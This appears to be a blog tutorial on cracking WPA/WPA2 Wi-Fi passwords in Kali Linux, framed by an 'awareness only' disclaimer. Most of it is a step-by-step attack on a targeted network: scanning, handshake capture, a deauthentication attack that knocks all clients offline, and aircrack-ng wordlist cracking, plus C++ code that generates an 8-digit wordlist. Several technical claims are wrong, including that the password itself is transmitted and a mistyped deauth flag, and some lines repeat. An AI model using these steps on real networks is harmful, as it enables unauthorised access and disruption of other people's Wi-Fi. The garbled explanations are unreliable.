Before going to discuss about this topic I want to make sure that I am not promoting any sort of illegal hacking. This article or Tutorial is only written and published in the interest of bring awareness in people that , it’s how easy to hack into a WPA/WPA-2 wi-fi network.
Warning: Hacking into others wi-fi networks and stealing their data is a serious offence. There will be serious actions taken if you get caught. I never promote illegal hacking.
While discussing about WPA/WPA-2 PSK wi-fi networks, WPA stands for wireless protected access and WPA-2 stands for wireless protected access-2 and PSK stands for pre-shared key.
The password length of a WPA/WPA-2 PSK wi-fi network is between 8 to 63 long.
The password length of a WPA/WPA-2 PSK wi-fi network is between 8 to 63 long.
Before hacking into a WPA/WPA-2 PSK wi-fi network we need to know how actually this network works. When a user is trying to connect to this type of network , he/she needs to enter a correct password which was assigned to the specific network ssid which he/she wants to connect. The password which is entered in the users device is sent to the wi-fi network router, this transfer is carried out via air with 802.11b protocol. The data which contains the password is sent to the router in the form of packets. When the password is received at the router the router checks the password which was sent by the user who is trying to connect to this network will be compared and checked with original password which is assigned to that network ssid. If the password matches then user can connect into the network and if the password dosen’t matches the connection is terminated. So we do know that the client/device which is trying to connect to the wi-fi network sends the password in encrypted packets of data. Here we are going to intercept the connection and capture the encrypted password so that we can decrypt it using a word list.
A word list consists of all possible combinations of strings (alphabetical, alphanumerical, numerical, etc) of length 8 to 63 characters long.
In this tutorial I am using Airmon-ng tool in Kali Linux operating system to explain how anyone can hack a WPA/WPA-2 wi-fi network.
STEP 1
Open terminal in Kali Linux and enter the following command.
root@kali:~ # airmon-ng check kill
This command kills the ongoing Wi-Fi processes.
STEP 2
Now we have to scan the all available wi-fi networks until we find our targeted wi-fi network.
root@kali:~ # airodump-ng <network interface name>
By the above command we can scan and find the targeted wi-fi network within the range.After finding the target network, to terminate scanning press key ctrl+c
The network interface name is the wireless card name if there is 1 wireless card attached to computer then the name of the card is wlan0.
STEP 3
Once you find the target network all we need to do is attack it.
root@kali:~ # airodump-ng -c <channel> -w <file name to save> --bssid <BSSID> <network interface name>
The above command will be taking the handshake file and save it in .cap format. It means the encrypted password from the user which is send to router is being captured and saved in a file for the decryption of password.
STEP 4
Open a new terminal window and enter the following command.
root@kali:~ # aireplay-ng -o o -a <bssid> <network interface name>
The above command is to create a wi-fi de-authentication attack in-order to intercept the encrypted the password from the connected clients. The above command disconnects the all connected devices/clients from the targeted network so they tend to reconnect to the network.
Deactivate the de-authentication attack we see a WPA handshake:<bssid> on the previous terminal where we performed the capturing of handshake file.
press key ctrl+c to de-activate the de-authentication attack.
We have successful captured the encrypted password but we need to decrypt the password.
STEP 5
Scroll down to check about word list.
Scroll down to check about word list.
root@kali:~ # aircrack-ng -w <directory of word list> <file generated during handshake with extension.cap
This command will check all the strings in the word list with the handshake file and if found it will show the password.
This is how we can hack a WPA/WPA-2 wi-fi networks using Airmon-ng tool in Kali Linux operating system.
I prepared a word list but I cannot upload the files, so I wrote a code to generate the word list so you can run the code on your pc to obtain the word list or you can download the word list from internet or any other websites.
Code to generate a 8-digit word list:
#include <bits/stdc++.h>
using namespace std;
int main(){
ofstream out;
out.open("craker.txt");
int count = 10;
for (unsigned int i = 0; i < count; i += 1)
for (unsigned int j = 0; j < count; j += 1)
for (unsigned int k = 0; k < count; k += 1)
for (unsigned int m = 0; m < count; m += 1)
for (unsigned int n = 0; n < count; n += 1)
for (unsigned int v = 0; v < count; v += 1)
for (unsigned int t = 0; t < count; t += 1)
for (unsigned int r = 0; r < count; r += 1)
out<<i<<j<<k<<m<<n<<v<<t<<r<<endl;
out.close();
return 0;
}
If you have any doubts regarding this tutorial drop them in the comments section below and I will get through them.
If you face any difficulty while going through this tutorial I made a video tutorial so that you can watch it from the link bellow:
https://youtu.be/00EhvJM0sjo
